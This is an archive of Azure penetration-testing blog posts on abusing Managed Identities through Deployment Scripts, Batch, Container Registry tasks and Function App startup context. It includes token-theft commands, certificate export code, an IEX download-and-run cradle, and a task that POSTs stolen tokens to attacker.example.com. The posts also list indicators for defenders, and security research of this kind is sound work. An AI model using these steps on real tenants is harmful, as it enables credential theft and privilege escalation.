Karl Fosaaen

As VP of Research, Karl is part of a team developing new services and product offerings at NetSPI. Karl previously oversaw the Cloud Penetration Testing service lines at NetSPI and is one of the founding members of NetSPI's Portland, OR team. Karl holds a Bachelor's degree in Computer Science from the University of Minnesota and has been in the security consulting industry for 15 years. Karl spends most of his research time focusing on Azure security and contributing to the NetSPI blog. As part of this research, Karl created the MicroBurst toolkit to house many of the PowerShell tools that he uses for testing Azure. In 2021, Karl co-authored the book "Penetration Testing Azure for Ethical Hackers" with David Okeyode.
Azure Deployment Scripts: Assuming User-Assigned Managed Identities
March 14, 2024

As Azure penetration testers, we often run into overly permissioned User-Assigned Managed Identities. This type of Managed Identity is a subscription level resource that can be applied to multiple other Azure resources. Once applied to another resource, it allows the resource to utilize the associated Entra ID identity to authenticate and gain access to other Azure resources. These are typically used in cases where Azure engineers want to easily share specific permissions with multiple Azure resources. An attacker, with the correct permissions in a subscription, can assign these identities to resources that they control, and can get access to the permissions of the identity. 

When we attempt to escalate our permissions with an available User-Assigned Managed Identity, we can typically choose from one of the following services to attach the identity to:

Once we attach the identity to the resource, we can then use that service to generate a token (to use with Microsoft APIs) or take actions as that identity within the service. We’ve linked out on the above list to some blogs that show how to use those services to attack Managed Identities. 

The last item on that list (Deployment Scripts) is a more recent addition (2023). After taking a look at Rogier Dijkman's post, "Project Miaow (Privilege Escalation from an ARM template)", we started making more use of Deployment Scripts as a method for "borrowing" User-Assigned Managed Identities. We will use this post to expand on Rogier's blog and show a new MicroBurst function that automates this attack.

TL;DR 

  • Attackers may get access to a role that allows assigning a Managed Identity to a resource 
  • Deployment Scripts allow attackers to attach a User-Assigned Managed Identity 
  • The Managed Identity can be used (via Az PowerShell or AZ CLI) to take actions in the Deployment Scripts container 
  • Depending on the permissions of the Managed Identity, this can be used for privilege escalation 
  • We wrote a tool to automate this process 

What are Deployment Scripts? 

As an alternative to running local scripts for configuring deployed Azure resources, the Azure Deployment Scripts service allows users to run code in a containerized Azure environment. The containers themselves are created as “Container Instances” resources in the Subscription and are linked to the Deployment Script resources. There is also a supporting “*azscripts” Storage Account that gets created for the storage of the Deployment Script file resources. This service can be a convenient way to create more complex resource deployments in a subscription, while keeping everything contained in one ARM template.

In Rogier’s blog, he shows how an attacker with minimal permissions can abuse their Deployment Script permissions to attach a Managed Identity (with the Owner Role) and promote their own user to Owner. During an Azure penetration test, we don’t often need to follow that exact scenario. In many cases, we just need to get a token for the Managed Identity to temporarily use with the various Microsoft APIs.

Automating the Process

In situations where we have escalated to some level of “write” permissions in Azure, we usually want to do a review of available Managed Identities that we can use, and the roles attached to those identities. This process technically applies to both System-Assigned and User-Assigned Managed Identities, but we will be focusing on User-Assigned for this post.

This is a pretty simple process for User-Assigned Managed Identities. We can use the following one-liner to enumerate all of the roles applied to a User-Assigned Managed Identity in a subscription:

Get-AzUserAssignedIdentity | ForEach-Object { Get-AzRoleAssignment -ObjectId $_.PrincipalId }

Keep in mind that the Get-AzRoleAssignment call listed above will only return the role assignments that your authenticated user can read. A Managed Identity may also have permissions in subscriptions that you don't have access to. The Invoke-AzUADeploymentScript function will attempt to enumerate all available roles assigned to the identities that you have access to, but the identity may still have roles in Subscriptions (or Management Groups) that you don't have read permissions on.
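If you also want to keep track of which identity each assignment belongs to, the one-liner can be expanded slightly. This is a sketch using the same Az PowerShell cmdlets as above:

```powershell
# Sketch: tag each readable role assignment with the identity it belongs to
Get-AzUserAssignedIdentity | ForEach-Object {
    $identity = $_
    Get-AzRoleAssignment -ObjectId $identity.PrincipalId |
        Select-Object @{ Name = 'Identity'; Expression = { $identity.Name } },
            RoleDefinitionName, Scope
}
```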

Once we have an identity to target, we can assign it to a resource (a Deployment Script) and generate tokens for the identity. Below is an overview of how we automate this process in the Invoke-AzUADeploymentScript function:

  • Enumerate available User-Assigned Managed Identities and their role assignments
  • Select the identity to target
  • Generate the malicious Deployment Script ARM template
  • Create a randomly named Deployment Script with the template
  • Get the output from the Deployment Script
  • Remove the Deployment Script and Resource Group Deployment
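For reference, the "malicious Deployment Script" step boils down to deploying an ARM template similar to the following sketch. The resource type and properties follow the public Microsoft.Resources/deploymentScripts schema; the identity path, name, and version values are illustrative placeholders:

```json
{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Resources/deploymentScripts",
      "apiVersion": "2020-10-01",
      "name": "exampleDeploymentScript",
      "location": "[resourceGroup().location]",
      "kind": "AzurePowerShell",
      "identity": {
        "type": "UserAssigned",
        "userAssignedIdentities": {
          "/subscriptions/<subscriptionId>/resourcegroups/<resourceGroup>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<identityName>": {}
        }
      },
      "properties": {
        "azPowerShellVersion": "8.3",
        "scriptContent": "$token = (Get-AzAccessToken -ResourceUrl 'https://management.azure.com').Token; $DeploymentScriptOutputs = @{ token = $token }",
        "timeout": "PT30M",
        "retentionInterval": "PT1H",
        "cleanupPreference": "OnSuccess"
      }
    }
  ]
}
```

The container runs the scriptContent as the attached identity, and anything placed in $DeploymentScriptOutputs is readable from the Deployment Script resource afterwards.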

Since we don’t have an easy way of determining if your current user can create a Deployment Script in a given Resource Group, the script assumes that you have Contributor (Write permissions) on the Resource Group containing the User-Assigned Managed Identity, and will use that Resource Group for the Deployment Script.

If you want to deploy your Deployment Script to a different Resource Group in the same Subscription, you can use the “-ResourceGroup” parameter. If you want to deploy your Deployment Script to a different Subscription in the same Tenant, use the “-DeploymentSubscriptionID” parameter and the “-ResourceGroup” parameter.

Finally, you can specify the scope of the tokens being generated by the function with the “-TokenScope” parameter.

Example Usage:

We have three different use cases for the function:

  1. Deploy to the Resource Group containing the target User-Assigned Managed Identity
Invoke-AzUADeploymentScript -Verbose
  2. Deploy to a different Resource Group in the same Subscription
Invoke-AzUADeploymentScript -Verbose -ResourceGroup "ExampleRG"
  3. Deploy to a Resource Group in a different Subscription in the same tenant
Invoke-AzUADeploymentScript -Verbose -ResourceGroup "OtherExampleRG" -DeploymentSubscriptionID "00000000-0000-0000-0000-000000000000"

*Where “00000000-0000-0000-0000-000000000000” is the Subscription ID that you want to deploy to, and “OtherExampleRG” is the Resource Group in that Subscription.

Additional Use Cases

Outside of the default action of generating temporary Managed Identity tokens, the function allows you to take advantage of the container environment to take actions with the Managed Identity from a (generally) trusted space. You can run specific commands as the Managed Identity using the “-Command” flag on the function. This is nice for obfuscating the source of your actions, as the usage of the Managed Identity will track back to the Deployment Script, versus using generated tokens away from the container.

Below are a couple of potential use cases and commands to use:

  • Run commands on VMs
  • Create RBAC Role Assignments
  • Dump Key Vaults, Storage Account Keys, etc.
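To make the use cases above concrete, here are a few hypothetical "-Command" values. These are sketches using standard Az PowerShell cmdlets; the vault, secret, and principal names are placeholders, and each one only works if the Managed Identity holds the corresponding rights:

```powershell
# Dump a Key Vault secret value (requires Key Vault data-plane access)
Invoke-AzUADeploymentScript -Verbose -Command 'Get-AzKeyVaultSecret -VaultName TargetVault -Name TargetSecret -AsPlainText'

# Grant a role to an attacker-controlled principal (requires Owner or User Access Administrator)
Invoke-AzUADeploymentScript -Verbose -Command 'New-AzRoleAssignment -ObjectId <attackerObjectId> -RoleDefinitionName Reader -Scope /subscriptions/<subscriptionId> | ConvertTo-Json'

# Dump Storage Account keys
Invoke-AzUADeploymentScript -Verbose -Command 'Get-AzStorageAccount | ForEach-Object { Get-AzStorageAccountKey -ResourceGroupName $_.ResourceGroupName -Name $_.StorageAccountName } | ConvertTo-Json'
```

Note the single-quoted outer strings, which keep variables like $_ from being expanded before the command reaches the container.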

Since the function expects string data as the output from the Deployment Script, make sure that the command you pass in via the "-Command" parameter returns its output as a string, so that your command output is returned.

Example:

Invoke-AzUADeploymentScript -Verbose -Command "Get-AzResource | ConvertTo-Json"

Lastly, if you’re running any particularly complex commands, then you may be better off loading in your PowerShell code from an external source as your “–Command” parameter. Using the Invoke-Expression (IEX) function in PowerShell is a handy way to do this.

Example:

IEX(New-Object System.Net.WebClient).DownloadString(‘https://example.com/DeploymentExec.ps1’) |  Out-String

Indicators of Compromise (IoCs)

We’ve included the primary IoCs that defenders can use to identify these attacks. These are listed in the expected chronological order for the attack.

Operation Name                                        Description
Microsoft.Resources/deployments/validate/action       Validate Deployment
Microsoft.Resources/deployments/write                 Create Deployment
Microsoft.Resources/deploymentScripts/write           Write Deployment Script
Microsoft.Storage/storageAccounts/write               Create/Update Storage Account
Microsoft.Storage/storageAccounts/listKeys/action     List Storage Account Keys
Microsoft.ContainerInstance/containerGroups/write     Create/Update Container Group
Microsoft.Resources/deploymentScripts/delete          Delete Deployment Script
Microsoft.Resources/deployments/delete                Delete Deployment

It’s important to note the final “delete” items on the list, as the function does clean up after itself and should not leave behind any resources.

Conclusion

While Deployment Scripts and User-Assigned Managed Identities are convenient for deploying resources in Azure, administrators of an Azure subscription need to keep a close eye on the permissions granted to users and Managed Identities. A slightly over-permissioned user with access to a significantly over-permissioned Managed Identity is a recipe for a fast privilege escalation.

Extracting Sensitive Information from the Azure Batch Service
February 28, 2024

We’ve recently seen an increased adoption of the Azure Batch service in customer subscriptions. As part of this, we’ve taken some time to dive into each component of the Batch service to help identify any potential areas for misconfigurations and sensitive data exposure. This research time has given us a few key areas to look at in the Azure Batch service, that we will cover in this blog. 

TL;DR

  • Azure Batch allows for scalable compute job execution
    • Think large data sets and High Performance Computing (HPC) applications 
  • Attackers with Reader access to Batch can: 
    • Read sensitive data from job outputs 
    • Gain access to SAS tokens for Storage Account files attached to the jobs 
  • Attackers with Contributor access can: 
    • Run jobs on the batch pool nodes 
    • Generate Managed Identity tokens 
    • Gather Batch Access Keys for job execution persistence 

The Azure Batch service functions as a middle ground between Azure Automation Accounts and a full deployment of an individual Virtual Machine to run compute jobs in Azure. This in-between space allows users of the service to spin up pools that have the necessary resource power, without the overhead of creating and managing a dedicated virtual system. This scalable service is well suited for high performance computing (HPC) applications, and easily integrates with the Storage Account service to support processing of large data sets. 

While there is a bit of a learning curve for getting code to run in the Batch service, the added power and scalability of the service can help users run workloads significantly faster than some of the similar Azure services. But as with any Azure service, misconfigurations (or issues with the service itself) can unintentionally expose sensitive information.

Service Background - Pools 

The Batch service relies on “Pools” of worker nodes. When the pools are created, there are multiple components you can configure that the worker nodes will inherit. Some important ones are highlighted here: 

  • User-Assigned Managed Identity 
    • Can be shared across the pool to allow workers to act as a specific Managed Identity 
  • Mount configuration 
    • Using a Storage Account Key or SAS token, you can add data storage mounts to the pool 
  • Application packages 
    • These are applications/executables that you can make available to the pool 
  • Certificates 
    • This is a feature that will be deprecated in 2024, but it could be used to make certificates available to the pool, including App Registration credentials 

The last pool configuration item that we will cover is the “Start Task” configuration. The Start Task is used to set up the nodes in the pool, as they’re spun up.

The "Resource files" setting for the pool allows you to select blobs or containers to make available to the "Start Task". The nice thing about this option is that it will generate the Storage Account SAS tokens for you.

While Contributor permissions are required to generate those SAS tokens, the tokens will get exposed to anyone with Reader permissions on the Batch account.

We have reported this issue to MSRC (see disclosure timeline below), as it’s an information disclosure issue, but this is considered expected application behavior. These SAS tokens are configured with Read and List permissions for the container, so an attacker with access to the SAS URL would have the ability to read all of the files in the Storage Account Container. The default window for these tokens is 7 days, so the window is slightly limited, but we have seen tokens configured with longer expiration times.

The last item that we will cover for the pool Start Task is the "Environment settings". It's not uncommon for us to see sensitive information passed into cloud services (regardless of the provider) via environment variables. Your mileage may vary with each Batch account that you look at, but we've had good luck finding sensitive information in these variables.
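If you'd like to review these Start Task settings yourself with Reader access, the pool configuration can be inspected with the Az.Batch module. This is a rough sketch; the account and resource group names are placeholders, and property names can vary slightly between module versions:

```powershell
# Sketch: review pool Start Task settings for secrets and SAS URLs
$context = Get-AzBatchAccount -AccountName "targetbatch" -ResourceGroupName "TargetRG"
Get-AzBatchPool -BatchContext $context | ForEach-Object {
    # Environment variables set on the Start Task (a common home for secrets)
    $_.StartTask.EnvironmentSettings | Select-Object Name, Value
    # Resource file URLs - these can embed pre-generated Storage SAS tokens
    $_.StartTask.ResourceFiles | Select-Object HttpUrl
}
```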

Service Background - Jobs

Once a pool has been configured, it can have jobs assigned to it. Each job has tasks that can be assigned to it. From a practical perspective, you can think of tasks as the same as the pool start tasks. They share many of the same configuration settings, but they just define the task level execution, versus the pool level. There are differences in how each one is functionally used, but from a security perspective, we’re looking at the same configuration items (Resource Files, Environment Settings, etc.). 

Generating Managed Identity Tokens from Batch

With Contributor rights on the Batch service, we can create new (or modify existing) pools, jobs, and tasks. By modifying existing configurations, we can make use of the already assigned Managed Identities. 

If there’s a User Assigned Managed Identity that you’d like to generate tokens for, that isn’t already used in Batch, your best bet is to create a new pool. Keep in mind that pool creation can be a little difficult. When we started investigating the service, we had to request a pool quota increase just to start using the service. So, keep that in mind if you’re thinking about creating a new pool.

To generate Managed Identity Tokens with the Jobs functionality, we will need to create new tasks to run under a job. Jobs need to be in an “Active” state to add a new task to an existing job. Jobs that have already completed won’t let you add new tasks.

In any case, you will need to make a call to the IMDS service, much like you would for a typical Virtual Machine, or a VM Scale Set Node.

(Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing).Content

To make Managed Identity token generation easier, we’ve included some helpful shortcuts in the MicroBurst repository - https://github.com/NetSPI/MicroBurst/tree/master/Misc/Shortcuts

If you’re new to escalating with Managed Identities in Azure, here are a few posts that will be helpful:

Alternatively, you may also be able to directly access the nodes in the pool via RDP or SSH. This can be done by navigating the Batch resource menus into the individual nodes (Batch Account -> Pools -> Nodes -> Name of the Node -> Connect). From here, you can generate credentials for a local user account on the node (or use an existing user) and connect to the node via SSH or RDP.

Once you’ve authenticated to the node, you will have full access to generate tokens and access files on the host.
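The credential generation step can also be scripted with the Az.Batch module. A sketch, where the account, pool, node ID, and password are all placeholders and parameter types can differ between module versions:

```powershell
# Sketch: create a local admin user on a Batch pool node for direct RDP/SSH access
$context = Get-AzBatchAccount -AccountName "targetbatch" -ResourceGroupName "TargetRG"
$password = ConvertTo-SecureString "Example-Password-123!" -AsPlainText -Force
New-AzBatchComputeNodeUser -PoolId "targetpool" -ComputeNodeId "<nodeId>" -Name "tempadmin" `
    -Password $password -IsAdmin -BatchContext $context
```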

Exporting Certificates from Batch Nodes

While this part of the service is being deprecated (February 29, 2024), we thought it would be good to highlight how an attacker might be able to extract certificates from existing node pools. It’s unclear how long those certificates will stick around after they’ve been deprecated, so your mileage may vary.

If there are certificates configured for the Pool, you can review them in the pool settings.

Once you have the certificate locations identified (either CurrentUser or LocalMachine), appropriately modify and use the following commands to export the certificates to Base64 data. You can run these commands via tasks, or by directly accessing the nodes.

$mypwd = ConvertTo-SecureString -String "TotallyNotaHardcodedPassword..." -Force -AsPlainText
Get-ChildItem -Path Cert:\CurrentUser\My\ | ForEach-Object {
    try {
        # Export each certificate (with private key) to a password-protected PFX file
        Export-PfxCertificate -Cert $_.PSPath -FilePath (-join($_.PSChildName,'.pfx')) -Password $mypwd | Out-Null
        # Emit the PFX as Base64, then remove the temporary file
        [Convert]::ToBase64String([IO.File]::ReadAllBytes((-join($PWD,'\',$_.PSChildName,'.pfx'))))
        Remove-Item (-join($PWD,'\',$_.PSChildName,'.pfx'))
    }
    catch {}
}

Once you have the Base64 versions of the certificates, set the $b64 variable to the certificate data and use the following PowerShell code to write the file to disk.

$b64 = "MII…[Your Base64 Certificate Data]"
[IO.File]::WriteAllBytes("$PWD\testCertificate.pfx",[Convert]::FromBase64String($b64))

Note that the PFX certificate uses "TotallyNotaHardcodedPassword..." as a password. You can change the password in the first line of the extraction code.

Automating Information Gathering

Since we are most commonly assessing an Azure environment with the Reader role, we wanted to automate the collection of a few key Batch account configuration items. To support this, we created the “Get-AzBatchAccountData” function in MicroBurst.

The function collects the following information:

  • Pools Data
    • Environment Variables
  • Start Task Commands
    • Available Storage Container URLs
  • Jobs Data
    • Environment Variables
    • Tasks (Job Preparation, Job Manager, and Job Release)
    • Jobs Sub-Tasks
    • Available Storage Container URLs
  • With Contributor Level Access
    • Primary and Secondary Keys for Triggering Jobs

While I’m not a big fan of writing output to disk, this was the cleanest way to capture all of the data coming out of available Batch accounts.

Tool Usage:

Authenticate to the Az PowerShell module (Connect-AzAccount), import the “Get-AzBatchAccountData.ps1” function from the MicroBurst Repo, and run the following command:

PS C:\> Get-AzBatchAccountData -folder BatchOutput -Verbose
VERBOSE: Logged In as kfosaaen@example.com
VERBOSE: Dumping Batch Accounts from the "Sample Subscription" Subscription
VERBOSE: 	1 Batch Account(s) Enumerated
VERBOSE: 		Attempting to dump data from the testspi account
VERBOSE: 			Attempting to dump keys
VERBOSE: 			1 Pool(s) Enumerated
VERBOSE: 				Attempting to dump pool data
VERBOSE: 			13 Job(s) Enumerated
VERBOSE: 				Attempting to dump job data
VERBOSE: 		Completed dumping of the testspi account

This should create an output folder (BatchOutput) with your output files (Jobs, Keys, Pools). Depending on your permissions, you may not be able to dump the keys.

Conclusion

As part of this research, we reached out to MSRC on the exposure of the Container Read/List SAS tokens. The issue was initially submitted in June of 2023 as an information disclosure issue. Given the low priority of the issue, we followed up in October of 2023. We received the following email from MSRC on October 27th, 2023:

We determined that this behavior is considered to be 'by design'. Please find the notes below.

Analysis Notes: This behavior is as per design. Azure Batch API allows for the user to provide a set of urls to storage blobs as part of the API. Those urls can either be public storage urls, SAS urls or generated using managed identity. None of these values in the API are treated as “private”. If a user has permissions to a Batch account then they can view these values and it does not pose a security concern that requires servicing.

In general, we’re not seeing a massive adoption of Batch accounts in Azure, but we are running into them more frequently and we’re finding interesting information. This does seem to be a powerful Azure service, and (potentially) a great one to utilize for escalations in Azure environments.

January 4, 2024

In the ever-evolving landscape of containerized applications, Azure Container Registry (ACR) is one of the more commonly used services in Azure for the management and deployment of container images. ACR not only serves as a secure and scalable repository for Docker images, but also offers a suite of powerful features to streamline management of the container lifecycle. One of those features is the ability to run build and configuration scripts through the "Tasks" functionality.  

This functionality does have some downsides, as it can be abused by attackers to generate tokens for any Managed Identities that are attached to the ACR. In this blog post, we will show the processes used to create a malicious ACR task that can be used to export tokens for Managed Identities attached to an ACR. We will also show a new tool within MicroBurst that can automate this whole process for you. 

TL;DR 

  • Azure Container Registries (ACRs) can have attached Managed Identities 
  • Attackers can create malicious tasks in the ACR that generate and export tokens for the Managed Identities 
  • We've created a tool in MicroBurst (Invoke-AzACRTokenGenerator) that automates this attack path 

Previous Research 

To be fully transparent, this blog and tooling were the result of trying to replicate some prior research from Andy Robbins (Abusing Azure Container Registry Tasks) that was well documented, but lacked commands that could be copied and pasted to recreate the attack. While the original blog focuses on overwriting existing tasks, we will focus on creating new tasks and automating the whole process with PowerShell. A big thank you to Andy for the original research, and I hope this tooling helps others replicate the attack.

Attack Process Overview 

Here is the general attack flow that we will be following: 

  1. The attacker has Contributor (Write) access on the ACR
    • Technically, you could also poison existing ACR task files in a GitHub repo, but the previous research (noted above) does a great job of explaining that issue
  2. The attacker creates a malicious YAML task file
    • The task authenticates to the Az CLI as the Managed Identity, then generates a token
  3. A Task is created with the AZ CLI and the YAML file
  4. The Task is run in the ACR Task container
  5. The token is written to the Task output, then retrieved by the attacker

If you want to replicate the attack using the AZ CLI, use the following steps:

  1. Authenticate to the AZ CLI (az login) with an account that has the Contributor role on the ACR
  2. Identify the available Container Registries with the following command:
az acr list
  3. Write the following YAML to a local file (.\taskfile):
version: v1.1.0 
steps: 
  - cmd: az login --identity --allow-no-subscriptions 
  - cmd: az account get-access-token 
    • Note that this assumes a System-Assigned Managed Identity; if you're using a User-Assigned Managed Identity, you will need to add "--username <client_id|object_id|resource_id>" to the login command 
  4. Create the task in the ACR ($ACRName) with the following command:
az acr task create --registry $ACRName --name sample_acr_task --file .\taskfile --context /dev/null --only-show-errors --assign-identity [system] 
    • If you're using a User-Assigned Managed Identity, replace [system] with the resource path ("/subscriptions/<subscriptionId>/resourcegroups/<myResourceGroup>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<myUserAssignedIdentity>") for the identity you want to use 
  5. Use the following command to run the task in the ACR:
az acr task run -n sample_acr_task -r $acrName 
    • The task output, including the token, should be displayed in the output of the run command 
  6. Delete the task with the following command:
az acr task delete -n sample_acr_task -r $acrName -y 

Please note that while the task may be deleted, the "Runs" of the task will still show up in the ACR. Since Managed Identity tokens have a limited shelf-life, this isn't a huge concern, but it would expose the token to anyone with the Reader role on the ACR. If you are concerned about this, feel free to modify the task definition to use another method (HTTP POST) to exfiltrate the token. 
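If you would rather keep the token out of the run logs entirely, the task file itself can handle the exfiltration. A sketch of that variant, assuming curl and shell piping are available in the task container, with https://attacker.example.com as a placeholder listener:

```yaml
version: v1.1.0
steps:
  - cmd: az login --identity --allow-no-subscriptions
  # POST the token to the listener instead of writing it to the task output;
  # the listener URL is a placeholder for an attacker-controlled endpoint
  - cmd: bash -c "az account get-access-token | curl -s -X POST -d @- https://attacker.example.com/collect"
```

This keeps the token out of the run output that anyone with the Reader role on the ACR could otherwise retrieve.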

Automating Managed Identity Token Extraction in Azure Container Registries

Invoke-AzACRTokenGenerator Usage/overview 

To automate this process, we added the Invoke-AzACRTokenGenerator function to the MicroBurst toolkit. The function follows the above methodology and uses a mix of the Az PowerShell module cmdlets and REST API calls to replace the AZ CLI commands.  

A couple of things to note: 

  • The function will prompt you (via Out-GridView) for a Subscription to use and for the ACRs that you want to target 
    • Keep in mind that you can multi-select (Ctrl+click) Subscriptions and ACRs to help exploit multiple targets at once 
  • By default, the function generates tokens for the "Management" (https://management.azure.com/) service 
    • If you want to specify a different scope endpoint, you can do so with the -TokenScope parameter. Two commonly used options: 
      • https://graph.microsoft.com/ - Used for accessing the Graph API 
      • https://vault.azure.net - Used for accessing the Key Vault API 
  • The output is a Data Table object that can be assigned to a variable 
    • $tokens = Invoke-AzACRTokenGenerator 
    • Results can also be appended to an existing object with "+=", which is handy for storing multiple token scopes (Management, Graph, Vault) in one object 

This command will be imported with the rest of the MicroBurst module, but you can use the following command to manually import the function into your PowerShell session: 

Import-Module .\MicroBurst\Az\Invoke-AzACRTokenGenerator.ps1 

Once imported, the function is simple to use: 

Invoke-AzACRTokenGenerator -Verbose 

Example Output:


Indicators of Compromise (IoCs) 

To better support the defenders out there, we've included some IoCs that you can look for in your Azure activity logs to help identify this kind of attack. 

Operation Name                                                      Description 
Microsoft.ContainerRegistry/registries/tasks/write                  Create or update a task for a container registry. 
Microsoft.ContainerRegistry/registries/scheduleRun/action           Schedule a run against a container registry. 
Microsoft.ContainerRegistry/registries/runs/listLogSasUrl/action    Get the log SAS URL for a run. 
Microsoft.ContainerRegistry/registries/tasks/delete                 Delete a task for a container registry.
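These operations can be hunted with a Log Analytics query; a minimal KQL sketch, assuming your Activity Logs are forwarded to the AzureActivity table:

```kql
AzureActivity
| where OperationNameValue in~ (
    "Microsoft.ContainerRegistry/registries/tasks/write",
    "Microsoft.ContainerRegistry/registries/scheduleRun/action",
    "Microsoft.ContainerRegistry/registries/runs/listLogSasUrl/action",
    "Microsoft.ContainerRegistry/registries/tasks/delete")
| project TimeGenerated, Caller, CallerIpAddress, OperationNameValue, ResourceGroup
```

A short burst of task write, run, and delete events from a single caller matches the attack flow described above.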

Conclusion 

The Azure ACR tasks functionality is very helpful for automating the lifecycle of a container, but permissions misconfigurations can allow attackers to abuse attached Managed Identities to move laterally and escalate privileges.  

If you’re currently using Azure Container Registries, make sure you review the permissions assigned to the ACRs, along with any permissions assigned to attached Managed Identities. It would also be worthwhile to review permissions on any tasks that you have stored in GitHub, as those could be vulnerable to poisoning attacks. Finally, defenders should look at existing task files to see if there are any malicious tasks, and make sure that you monitor the actions that we noted above. 

[post_title] => Automating Managed Identity Token Extraction in Azure Container Registries [post_excerpt] => Learn the processes used to create a malicious Azure Container Registry task that can be used to export tokens for Managed Identities attached to an ACR. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => automating-managed-identity-token-extraction-in-azure-container-registries [to_ping] => [pinged] => [post_modified] => 2024-01-03 15:13:38 [post_modified_gmt] => 2024-01-03 21:13:38 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=31693 [menu_order] => 19 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [3] => WP_Post Object ( [ID] => 31440 [post_author] => 10 [post_date] => 2023-11-16 09:00:00 [post_date_gmt] => 2023-11-16 15:00:00 [post_content] =>

As we were preparing our slides and tools for our DEF CON Cloud Village Talk (What the Function: A Deep Dive into Azure Function App Security), Thomas Elling and I stumbled onto an extension of some existing research that we disclosed on the NetSPI blog in March of 2023. We had started working on a function that could be added to a Linux container-based Function App to decrypt the container startup context that is passed to the container on startup. As we got further into building the function, we found that the decrypted startup context disclosed more information than we had previously realized. 

TL;DR 

  1. The Linux containers in Azure Function Apps utilize an encrypted startup context file hosted in Azure Storage Accounts
  2. The Storage Account URL and the decryption key are stored in the container environmental variables and are available to anyone with the ability to execute commands in the container
  3. This startup context can be decrypted to expose sensitive data about the Function App, including the certificates for any attached Managed Identities, allowing an attacker to gain persistence as the Managed Identity. As of November 11, 2023, this issue has been fully addressed by Microsoft. 

In the earlier blog post, we utilized an undocumented Azure Management API (as the Azure RBAC Reader role) to complete a directory traversal attack to gain access to the proc file system files. This allowed access to the environmental variables (/proc/self/environ) used by the container. These environmental variables (CONTAINER_ENCRYPTION_KEY and CONTAINER_START_CONTEXT_SAS_URI) could then be used to decrypt the startup context of the container, which included the Function App keys. These keys could then be used to overwrite the existing Function App Functions and gain code execution in the container. At the time of the previous research, we had not investigated the impact of having a Managed Identity attached to the Function App. 

As part of the DEF CON Cloud Village presentation preparation, we wanted to provide code for an Azure function that would automate the decryption of this startup context in the Linux container. This could be used as a shortcut for getting access to the function keys in cases where someone has gained command execution in a Linux Function App container, or gained Storage Account access to the supporting code hosting file shares.  

Here is the PowerShell sample code that we started with:

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 

$encryptedContext = (Invoke-RestMethod $env:CONTAINER_START_CONTEXT_SAS_URI).encryptedContext.split(".") 

$key = [System.Convert]::FromBase64String($env:CONTAINER_ENCRYPTION_KEY) 
$iv = [System.Convert]::FromBase64String($encryptedContext[0]) 
$encryptedBytes = [System.Convert]::FromBase64String($encryptedContext[1]) 

$aes = [System.Security.Cryptography.AesManaged]::new() 
$aes.Mode = [System.Security.Cryptography.CipherMode]::CBC 
$aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 
$aes.Key = $key 
$aes.IV = $iv 

$decryptor = $aes.CreateDecryptor() 
$plainBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length) 
$plainText = [System.Text.Encoding]::UTF8.GetString($plainBytes) 

$body =  $plainText 

# Associate values to output bindings by calling 'Push-OutputBinding'. 
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{ 
    StatusCode = [HttpStatusCode]::OK 
    Body = $body 
})

At a high level, this PowerShell code retrieves the encrypted context from the SAS-tokened URL in the environmental variable and stores it in a variable. We then set the decryption key from the corresponding environmental variable and the IV from the first section of the encrypted context, complete the AES decryption, and output the fully decrypted context in the HTTP response. 
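For reference outside of PowerShell, the payload format is straightforward to handle in other languages as well. A stdlib-only Python sketch of the parsing and padding steps (the AES-CBC decryption itself would be done with a crypto library; the helper names here are our own):

```python
import base64


def parse_startup_context(encrypted_context: str):
    """Split the startup-context payload into its IV and ciphertext parts.

    The payload is two base64 strings joined by '.':
    base64(IV) + '.' + base64(ciphertext). The AES-CBC decryption of the
    ciphertext is not shown; it would be done with a crypto library using
    the base64-decoded CONTAINER_ENCRYPTION_KEY value.
    """
    iv_b64, ct_b64 = encrypted_context.split(".", 1)
    return base64.b64decode(iv_b64), base64.b64decode(ct_b64)


def pkcs7_unpad(data: bytes) -> bytes:
    # After CBC decryption, strip PKCS7 padding; the last byte is the pad length
    return data[: -data[-1]]
```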

When building this code, we used an existing Function App in our subscription that had a Managed Identity attached to it. Upon inspecting the decrypted startup context, we noticed a previously overlooked “MSISpecializationPayload” section of the configuration that contained a list of identities attached to the Function App. 

"MSISpecializationPayload": { 
    "SiteName": "notarealfunctionapp", 
    "MSISecret": "57[REDACTED]F9", 
    "Identities": [ 
      { 
        "Type": "SystemAssigned", 
        "ClientId": " b1abdc5c-3e68-476a-9191-428c1300c50c", 
        "TenantId": "[REDACTED]", 
        "Thumbprint": "BC5C431024BC7F52C8E9F43A7387D6021056630A", 
        "SecretUrl": "https://control-centralus.identity.azure.net/subscriptions/[REDACTED]/", 
        "ResourceId": "", 
        "Certificate": "MIIK[REDACTED]H0A==", 
        "PrincipalId": "[REDACTED]", 
        "AuthenticationEndpoint": null 
      }, 
      { 
        "Type": "UserAssigned", 
        "ClientId": "[REDACTED]", 
        "TenantId": "[REDACTED]", 
        "Thumbprint": "B8E752972790B0E6533EFE49382FF5E8412DAD31", 
        "SecretUrl": "https://control-centralus.identity.azure.net/subscriptions/[REDACTED]", 
        "ResourceId": "/subscriptions/[REDACTED]/Microsoft.ManagedIdentity/userAssignedIdentities/[REDACTED]", 
        "Certificate": "MIIK[REDACTED]0A==", 
        "PrincipalId": "[REDACTED]", 
        "AuthenticationEndpoint": null 
      } 
    ], 
[Truncated]

In each identity listed (SystemAssigned and UserAssigned), there was a “Certificate” section that contained Base64 encoded data, that looked like a private certificate (starts with “MII…”). Next, we decoded the Base64 data and wrote it to a file. Since we assumed that this was a PFX file, we used that as the file extension.  

$b64 = " MIIK[REDACTED]H0A==" 

[IO.File]::WriteAllBytes("C:\temp\micert.pfx", [Convert]::FromBase64String($b64))

